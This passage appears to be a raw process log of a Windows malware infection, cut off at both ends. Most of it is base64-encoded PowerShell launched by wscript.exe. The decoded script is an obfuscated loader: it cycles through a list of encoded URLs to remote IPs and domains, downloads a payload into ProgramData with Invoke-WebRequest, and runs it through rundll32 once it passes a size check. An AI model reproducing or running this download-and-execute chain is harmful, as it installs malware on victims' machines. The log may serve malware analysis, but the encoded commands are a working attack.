EEAYQBBAEIAeQBBAEcARQBBAGMAdwBCAHAAQQBIAE0AQQBkAEEAQQB1AEEASABBAEEAYgBBAEIAMQBBAEgATQBBAHYASABBAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AUQBBAHUAQQBEAFkAQQBNAEEAQQB1AEEARABRAEEATQBRAEEAdQBBAEQARQBBAE4AQQBBADIAQQBBAD0APQB2AEgAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFQAQQBIAFUAQQBZAGcAQgAwAEEARwBrAEEAZABBAEIAcwBBAEcAawBBAGIAZwBCAG4AQQBFAFUAQQBlAEEAQgAwAEEASABVAEEAYwB3AEIAcABBAEcAOABBAGIAZwBBAHUAQQBHAE0AQQBZAFEAQgB3AEEARwBVAEEAZABBAEIAdgBBAEgAYwBBAGIAZwBBAD0AdgBIAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEARwA0AEEAYQBnAEIAdgBBAEgAawBBAGEAUQBCAHUAQQBHAGMAQQBiAEEAQgA1AEEAQwA0AEEAWgBnAEIAeQBBAEEAPQA9ACIAOwAkAGUAZABlAG8AbABvAGcAeQBDAG8AbgBuAG8AdABhAHQAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAQQBBAE8AQQBBAHUAQQBEAEkAQQBOAEEAQQAzAEEAQwA0AEEATwBRAEEAMwBBAEMANABBAE4AQQBBAHoAQQBDADgAQQBjAFEAQgBrAEEARgBBAEEATAB3AEIAMwBBAEUAWQBBAEoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAawBBAEwAdwBCAEUAQQBHAFUAQQBhAHcAQgBQAEEARgBBAEEAWgB3AEEAdgBBAEQAYwBBAFoAZwBCAGkAQQBFAE0AQQBlAFEAQgBoAEEASABRAEEAVABBAEIANQBBAEEAPQA9AEoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAFEAQQAzAEEAQwA0AEEATwBRAEEAeQBBAEMAOABBAFMAZwBCAFUAQQBHAGsAQQBMAHcAQgAwAEEARgBvAEEAYgBnAEIAcABBAEUAVQBBAFIAZwBBAD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBOAGcAQQA0AEEAQwA4AEEATwBRAEIARABBAEcAMABBAE8AUQBCAEYAQQBGAGMAQQBMAHcAQgBKAEEARQBNAEEAVgB3AEEAdwBBAEcAYwBBAE8AUQBCAFMAQQBFAHMAQQBRAFEAQgBMAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAYwBsAGEAeQBvAHEAdQBvAHQAWABpAHAAaABvAHMAdQByAGUAIABpAG4AIAAkAGUAZABlAG8AbABvAGcAeQBDAG8AbgBuAG8AdABhAHQAZQAgAC0AcwBwAGwAaQB0ACAAIgBKACIAKQAgAHsAJABDAGgAYQByAGkAbAB5AEMAbwByAG4AaQB4ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATQBRAEEAdQBBAEQARQBBAE0AdwBBAHoAQQBDADQAQQBNAGcAQQB3AEEARABJAEEATABnAEEAeABBAEQAWQBBAE4AUQBBAD0ASQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQAZwBBAEwAZwBBAHgAQQBEAGcAQQBOAHcAQQB1AEEARABFAEEATQBRAEEAMABBAEEAPQA9ACIAOwAkAEIAbwBuAHoAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBBAEEAdQBBAEQASQBBAE4AQQBBAHgAQQBDADQAQQBNAFEAQQAyAEEARABRAEEATABnAEEAeABBAEQASQBBAE0AZwBBAD0AdgBmAFcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAxAEEARABjAEEATABnAEEANABBAEQAQQBBAEwAZwBBADAAQQBEAFUAQQBMAGcAQQB4AEEARABrAEEATgBBAEEAPQB2AGYAVwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBiAGcAQgB1AEEARwBVAEEAWQB3AEIAMABBAEcARQBBAGIAZwBCADAAQQBFAGsAQQBaAEEAQgBwAEEARwA4AEEAWQB3AEIAbwBBAEgASQBBAGIAdwBCAHQAQQBHADgAQQBjAHcAQgB2AEEARwAwAEEAWgBRAEEAdQBBAEcAVQBBAGMAdwBCADAAQQBHAEUAQQBkAEEAQgBsAEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAFUAbgBzAGkAbgBnAGwAZQBuAGUAcwBzAEIAbwBuAHMAcABpAGUAbABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAxAEEARABFAEEATABnAEEAeQBBAEQAUQBBAE4AQQBBAHUAQQBEAFEAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMABBAEEAPQA9AFoAcQBDAD0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBOAEEARwBVAEEAYwB3AEIAaABBAEcAdwBBAGIAQQBCAHAAQQBHAEUAQQBiAGcAQgBqAEEARwBVAEEATABnAEIAdwBBAEcAawBBAFkAdwBCAHoAQQBBAD0APQAiADsAJAB1AG4AZABlAHIAdABlAGEAbQBlAGQAQwBpAHQAaQBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEkAQQBHAFUAQQBkAEEAQgBsAEEASABJAEEAYgB3AEIANABBAEcAVQBBAGIAZwBCAHYAQQBIAFUAQQBjAHcAQQB1AEEARwBZAEEAWQBRAEIAcABBAEcAdwBBAEgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABFAEEATgB3AEEAdQBBAEQASQBBAE0AZwBBAHgAQQBDADQAQQBPAEEAQQAzAEEAQwA0AEEATQBnAEEAdwBBAEQAVQBBAEgAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATQBRAEEAMQBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAGcAQQA1AEEARABJAEEATABnAEEAeABBAEQARQBBAE8AUQBBAD0AIgA7ACQAVQBuAGMAbwBuAHQAZQBtAHAAbABhAHQAaQB2AGUAbgBlAHMAcwBEAGUAYwBhAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABjAGwAYQB5AG8AcQB1AG8AdABYAGkAcABoAG8AcwB1AHIAZQApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAFUAbgBjAG8AbgB0AGUAbQBwAGwAYQB0AGkAdgBlAG4AZQBzAHMARABlAGMAYQBkAGUAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABhAG0AaQBuAGEAdABpAG8AbgAuAHUAbgBuAGEAaQB2AGUAbAB5ADsAJABQAG8AbAB5AHIAaAB5AHQAaABtAGkAYwBhAGwAbAB5AFMAdQBwAGUAcgBjAGEAcAB0AGkAbwBuACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBVAEEASABJAEEAWQBRAEIAdABBAEcAVQBBAGIAQQBCAHMAQQBDADQAQQBZAHcAQgBoAEEARwBZAEEAWgBRAEEAPQBPAHQAUwBhAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAQwBBAEcAOABBAGIAZwBCAGwAQQBHAEUAQQBZAHcAQgBvAEEARwBVAEEATABnAEIAegBBAEgAUQBBAE8AdABTAGEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABZAEEATQB3AEEAdQBBAEQASQBBAE0AdwBBAHoAQQBDADQAQQBNAGcAQQB6AEEARABVAEEATABnAEEAeQBBAEQAQQBBAE4AdwBBAD0ATwB0AFMAYQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFUAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAMQBBAEMANABBAE0AZwBBAHkAQQBEAEUAQQBMAGcAQQAzAEEARABZAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABhAG0AaQBuAGEAdABpAG8AbgAuAHUAbgBuAGEAaQB2AGUAbAB5ACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgA1ADMAOQA5ADMAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBHAHcAQQBZAFEAQgB0AEEARwBrAEEAYgBnAEIAaABBAEgAUQBBAGEAUQBCAHYAQQBHADQAQQBMAGcAQgAxAEEARwA0AEEAYgBnAEIAaABBAEcAawBBAGQAZwBCAGwAQQBHAHcAQQBlAFEAQQBzAEEASABZAEEAYQBRAEIAdwBBAEgATQBBAE8AdwBCAE4AQQBFAGsAQQBWAEEAQgBNAEEARwBrAEEAWQB3AEIAbABBAEcANABBAGMAdwBCAGwAQQBBAD0APQAiADsAJABFAG4AcwBpAGUAbgB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQB3AEEANQBBAEMANABBAE0AUQBBAHcAQQBEAGMAQQBMAGcAQQB4AEEARABVAEEATwBBAEEAdQBBAEQASQBBAE0AUQBBADIAQQBBAD0APQB6AFAAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABRAEEAYQBBAEIAMQBBAEcAMABBAFkAZwBCAGwAQQBIAEkAQQBVAEEAQgA1AEEASABJAEEAYgB3AEIANABBAEgAawBBAGIAQQBCAGwAQQBDADQAQQBZAHcAQgB1AEEAQQA9AD0AegBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIATgBBAEcAawBBAFkAUQBCADYAQQBHAGsAQQBiAGcAQgBsAEEAQwA0AEEAWgB3AEIAeQBBAEcARQBBAGMAQQBCAG8AQQBHAGsAQQBZAHcAQgB6AEEAQQA9AD0AegBQAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE4AQQBBADAAQQBDADQAQQBNAFEAQQAwAEEARABBAEEATABnAEEAeABBAEQATQBBAE0AZwBBAHUAQQBEAEkAQQBNAGcAQQB3AEEAQQA9AD0AIgA7ACQAdgBpAGEAYgBpAGwAaQB0AGkAZQBzAEQAZQBuAHMAaABlAHIAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAEEAQQA1AEEAQwA0AEEATQBRAEEAMgBBAEQAVQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB1AEEARABnAEEATQBBAEEAPQBJAGIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBNAEEAYgBBAEIAcABBAEcANABBAGEAdwBCAHAAQQBHAFUAQQBjAGcAQQB1AEEARwBZAEEAZQBRAEIAcABBAEEAPQA9AEkAYgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEYAQQBHADQAQQBhAEEAQgBsAEEASABJAEEAYQBRAEIAMABBAEcARQBBAGIAZwBCAGoAQQBHAFUAQQBMAGcAQgBqAEEARwA0AEEASQBiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAVQBBAE0AUQBBAHUAQQBEAEUAQQBNAEEAQQB6AEEAQwA0AEEATQBRAEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAFkAQQBPAFEAQQA9ACIAOwAkAFQAbwByAG4AYQBkAGEAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQAwAEEAQwA0AEEATQBnAEEAeABBAEQATQBBAEwAZwBBAHgAQQBEAEEAQQBOAFEAQQB1AEEARABFAEEATgBBAEEAeABBAEEAPQA9AGYAZgBEAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAGIAdwBCAHoAQQBIAFEAQQBaAFEAQgB5AEEARwBrAEEAYgB3AEIAeQBBAEcAawBBAFQAUQBCADUAQQBIAFEAQQBhAEEAQgB2AEEASABBAEEAYgB3AEIAbABBAEgAUQBBAGEAUQBCADYAQQBHAFUAQQBMAGcAQgBqAEEARwB3AEEAZABRAEIAaQBBAEEAPQA9ACIAOwBiAHIAZQBhAGsAOwB9AH0AIABjAGEAdABjAGgAIAB7ACQAQQB1AGMAdABvAHIAaQBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAVQBBAEwAZwBBAHkAQQBEAEEAQQBOAEEAQQB1AEEARABFAEEATwBBAEEANABBAEEAPQA9AD0AdQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGMAQQBaAFEAQgB6AEEASABRAEEAYQBRAEIAagBBAEgAVQBBAGIAQQBCAGgAQQBHAE0AQQBhAFEAQgB2AEEASABVAEEAYwB3AEEAdQBBAEcAMABBAGIAdwBCAHkAQQBIAFEAQQBaAHcAQgBoAEEARwBjAEEAWgBRAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBUAEEARwB3AEEAYQBRAEIAMABBAEgAYwBBAGIAdwBCAHkAQQBHAHMAQQBMAGcAQgB0AEEARwBFAEEAYwBnAEIAcgBBAEcAVQBBAGQAQQBCAHAAQQBHADQAQQBaAHcAQQA9AD0AdQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAE0AQQBMAGcAQQB4AEEARABRAEEATgBRAEEAdQBBAEQASQBBAE0AQQBBAHkAQQBDADQAQQBNAFEAQQB3AEEARABBAEEAIgA7ACQAZQBlAHIAbwBjAGsAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEEAQQBPAFEAQQB1AEEARABJAEEATQBBAEEAMwBBAEMANABBAE0AUQBBAHoAQQBEAE0AQQBMAGcAQQB4AEEARABFAEEATgBRAEEAPQBsAGEAZQBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE4AdwBBAHUAQQBEAEUAQQBOAHcAQQAxAEEAQwA0AEEATgBBAEEAeABBAEMANABBAE0AUQBBAHoAQQBEAFkAQQBsAGEAZQBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARwBBAEcARQBBAGEAUQBCADAAQQBHAGcAQQBkAHcAQgB2AEEASABJAEEAZABBAEIAbwBBAEcAawBBAGIAZwBCAGwAQQBIAE0AQQBjAHcAQgBGAEEASABVAEEAWQB3AEIAbwBBAEgASQBBAGIAdwBCAHQAQQBHAEUAQQBkAEEAQgBwAEEARwA0AEEATABnAEIANgBBAEcAOABBAGIAZwBCAGwAQQBBAD0APQAiADsAJABuAGUAbwB0AGUAcgBpAGMAYQBsAGwAeQBQAHIAbwBiAGwAZQBtAGEAdABpAHMAdAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIASwBBAEcARQBBAFkAdwBCAGgAQQBIAEkAQQBZAFEAQgB1AEEARwBRAEEAWQBRAEEAdQBBAEcASQBBAGEAUQBCAHYAQQBBAD0APQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdABBAEgAVQBBAGMAdwBCAHAAQQBHAE0AQQBZAFEAQgBzAEEARwB3AEEAZQBRAEEAdQBBAEcAawBBAGIAUQBBAD0ATwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFkAQQBPAEEAQQB1AEEARABVAEEATQBRAEEAdQBBAEQAVQBBAE4AQQBBAHUAQQBEAEkAQQBOAEEAQQA0AEEAQQA9AD0AIgA7AH0AfQAkAG8AdAB0AG8AbQBhAG4AbABpAGsAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAdwBBAEcAZwBBAGUAUQBCAHoAQQBHAGsAQQBjAFEAQgAxAEEARwBVAEEATABnAEIAMgBBAEcAVQBBAFoAdwBCAGgAQQBIAE0AQQAiADsAJABTAHAAbABpAGMAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBqAEEASABVAEEAYgBRAEIAcABBAEcANABBAFkAUQBCAHMAQQBDADQAQQBjAHcAQgBoAEEARwB3AEEAWgBRAEEAPQBvAEgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBRAEEARwBVAEEAYgBnAEIAaABBAEcANABBAFkAdwBCAGwAQQBIAEkAQQBVAHcAQgBsAEEASABBAEEAZABRAEIAcwBBAEgAUQBBAEwAZwBCAG4AQQBHADAAQQBZAGcAQgBvAEEAQQA9AD0AbwBIAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAYwBBAFkAUQBCAHoAQQBIAEEAQQBhAFEAQgB6AEEARwBnAEEAYgBBAEIANQBBAEUATQBBAGEAQQBCAHkAQQBHAGsAQQBjAHcAQgAwAEEARwBrAEEAWQBRAEIAdQBBAEcAOABBAFoAdwBCAGwAQQBHADQAQQBkAEEAQgBwAEEARwB3AEEAYQBRAEIAegBBAEcAMABBAEwAZwBCAGgAQQBIAEkAQQBiAFEAQgA1AEEAQQA9AD0AbwBIAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAGQAUQBCAHMAQQBHADAAQQBiAHcAQgB1AEEARwBVAEEAWQB3AEIAMABBAEcAOABBAGIAUQBCADUAQQBGAFUAQQBiAGcAQgB6AEEASABrAEEAYgBRAEIAaQBBAEcAOABBAGIAQQBCAHAAQQBHAE0AQQBZAFEAQgBzAEEAQwA0AEEAWQB3AEIAbwBBAEgASQBBAGEAUQBCAHoAQQBIAFEAQQBiAFEAQgBoAEEASABNAEEAIgA7ACQAVwBvAHIAcgBpAGMAbwB3ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBZAEEAYgBBAEIAdgBBAEgASQBBAGEAUQBCAGsAQQBHAFUAQQBZAFEAQgB1AEEAQwA0AEEAYgBBAEIAdgBBAEcARQBBAGIAZwBBAD0AIgA7AA=="
parent_process wscript.exe martian_process powershell -encodedcommand "JABBAGwAbQBzAGcAaQB2AGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQASQBBAE0AQQBBAHgAQQBDADQAQQBNAFEAQQAwAEEARABZAEEATABnAEEAeQBBAEQAVQBBAE4AQQBBAHUAQQBEAGsAQQBPAEEAQQA9AEYAZQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAVQBBAGIAZwBCADAAQQBHAFUAQQBiAFEAQgB3AEEASABRAEEAYQBRAEIAaQBBAEcAdwBBAGUAUQBBAHUAQQBHADQAQQBaAFEAQgAwAEEASABjAEEAYgB3AEIAeQBBAEcAcwBBAEYAZQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgAQQBBAFoAUQBCADAAQQBHAEUAQQBjAGcAQgA1AEEAQwA0AEEAYgBnAEIAcwBBAEEAPQA9AEYAZQBaAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbABBAEcAdwBBAGEAUQBCAHQAQQBHAGsAQQBiAGcAQgBoAEEARwA0AEEAZABBAEEAdQBBAEcAawBBAGQAQQBBAD0AIgA7ACQAcAByAGUAZABpAHMAYwBvAHYAZQByAHkAVQBuAG0AYQByAHIAaQBhAGcAZQBhAGIAbABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABnAEEATgBnAEEAdQBBAEQARQBBAE0AdwBBAHoAQQBDADQAQQBNAGcAQQB4AEEARABZAEEATABnAEEANQBBAEQAVQBBACIAOwAkAGkAbgB0AG8AeABpAGMAYQB0AGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGMAQQBjAGcAQgBoAEEARwA0AEEAYgBnAEIAcABBAEcAVQBBAGMAdwBCAFEAQQBHAEUAQQBjAGcAQgBoAEEASABBAEEAYQBBAEIAeQBBAEcARQBBAGMAdwBCAHAAQQBIAE0AQQBkAEEAQQB1AEEASABBAEEAYgBBAEIAMQBBAEgATQBBAHYASABBAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAVQBBAE8AUQBBAHUAQQBEAFkAQQBNAEEAQQB1AEEARABRAEEATQBRAEEAdQBBAEQARQBBAE4AQQBBADIAQQBBAD0APQB2AEgAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFQAQQBIAFUAQQBZAGcAQgAwAEEARwBrAEEAZABBAEIAcwBBAEcAawBBAGIAZwBCAG4AQQBFAFUAQQBlAEEAQgAwAEEASABVAEEAYwB3AEIAcABBAEcAOABBAGIAZwBBAHUAQQBHAE0AQQBZAFEAQgB3AEEARwBVAEEAZABBAEIAdgBBAEgAYwBBAGIAZwBBAD0AdgBIAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBsAEEARwA0AEEAYQBnAEIAdgBBAEgAawBBAGEAUQBCAHUAQQBHAGMAQQBiAEEAQgA1AEEAQwA0AEEAWgBnAEIAeQBBAEEAPQA9ACIAOwAkAGUAZABlAG8AbABvAGcAeQBDAG8AbgBuAG8AdABhAHQAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAQQBBAE8AQQBBAHUAQQBEAEkAQQBOAEEAQQAzAEEAQwA0AEEATwBRAEEAMwBBAEMANABBAE4AQQBBAHoAQQBDADgAQQBjAFEAQgBrAEEARgBBAEEATAB3AEIAMwBBAEUAWQBBAEoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQASQBBAE0AdwBBADIAQQBDADQAQQBNAFEAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAawBBAEwAdwBCAEUAQQBHAFUAQQBhAHcAQgBQAEEARgBBAEEAWgB3AEEAdgBBAEQAYwBBAFoAZwBCAGkAQQBFAE0AQQBlAFEAQgBoAEEASABRAEEAVABBAEIANQBBAEEAPQA9AEoAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABrAEEATQBnAEEAdQBBAEQARQBBAE0AZwBBAHgAQQBDADQAQQBNAFEAQQAzAEEAQwA0AEEATwBRAEEAeQBBAEMAOABBAFMAZwBCAFUAQQBHAGsAQQBMAHcAQgAwAEEARgBvAEEAYgBnAEIAcABBAEUAVQBBAFIAZwBBAD0ASgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBNAGcAQQB1AEEARABFAEEATQBnAEEAeABBAEMANABBAE0AUQBBADMAQQBDADQAQQBOAGcAQQA0AEEAQwA4AEEATwBRAEIARABBAEcAMABBAE8AUQBCAEYAQQBGAGMAQQBMAHcAQgBKAEEARQBNAEEAVgB3AEEAdwBBAEcAYwBBAE8AUQBCAFMAQQBFAHMAQQBRAFEAQgBMAEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAYwBsAGEAeQBvAHEAdQBvAHQAWABpAHAAaABvAHMAdQByAGUAIABpAG4AIAAkAGUAZABlAG8AbABvAGcAeQBDAG8AbgBuAG8AdABhAHQAZQAgAC0AcwBwAGwAaQB0ACAAIgBKACIAKQAgAHsAJABDAGgAYQByAGkAbAB5AEMAbwByAG4AaQB4ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABBAEEATQBRAEEAdQBBAEQARQBBAE0AdwBBAHoAQQBDADQAQQBNAGcAQQB3AEEARABJAEEATABnAEEAeABBAEQAWQBBAE4AUQBBAD0ASQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQAZwBBAEwAZwBBAHgAQQBEAGcAQQBOAHcAQQB1AEEARABFAEEATQBRAEEAMABBAEEAPQA9ACIAOwAkAEIAbwBuAHoAZQBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBBAEEAdQBBAEQASQBBAE4AQQBBAHgAQQBDADQAQQBNAFEAQQAyAEEARABRAEEATABnAEEAeABBAEQASQBBAE0AZwBBAD0AdgBmAFcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAxAEEARABjAEEATABnAEEANABBAEQAQQBBAEwAZwBBADAAQQBEAFUAQQBMAGcAQQB4AEEARABrAEEATgBBAEEAPQB2AGYAVwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEUAQQBiAGcAQgB1AEEARwBVAEEAWQB3AEIAMABBAEcARQBBAGIAZwBCADAAQQBFAGsAQQBaAEEAQgBwAEEARwA4AEEAWQB3AEIAbwBBAEgASQBBAGIAdwBCAHQAQQBHADgAQQBjAHcAQgB2AEEARwAwAEEAWgBRAEEAdQBBAEcAVQBBAGMAdwBCADAAQQBHAEUAQQBkAEEAQgBsAEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAFUAbgBzAGkAbgBnAGwAZQBuAGUAcwBzAEIAbwBuAHMAcABpAGUAbABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQAxAEEARABFAEEATABnAEEAeQBBAEQAUQBBAE4AQQBBAHUAQQBEAFEAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMABBAEEAPQA9AFoAcQBDAD0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBOAEEARwBVAEEAYwB3AEIAaABBAEcAdwBBAGIAQQBCAHAAQQBHAEUAQQBiAGcAQgBqAEEARwBVAEEATABnAEIAdwBBAEcAawBBAFkAdwBCAHoAQQBBAD0APQAiADsAJAB1AG4AZABlAHIAdABlAGEAbQBlAGQAQwBpAHQAaQBlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEkAQQBHAFUAQQBkAEEAQgBsAEEASABJAEEAYgB3AEIANABBAEcAVQBBAGIAZwBCAHYAQQBIAFUAQQBjAHcAQQB1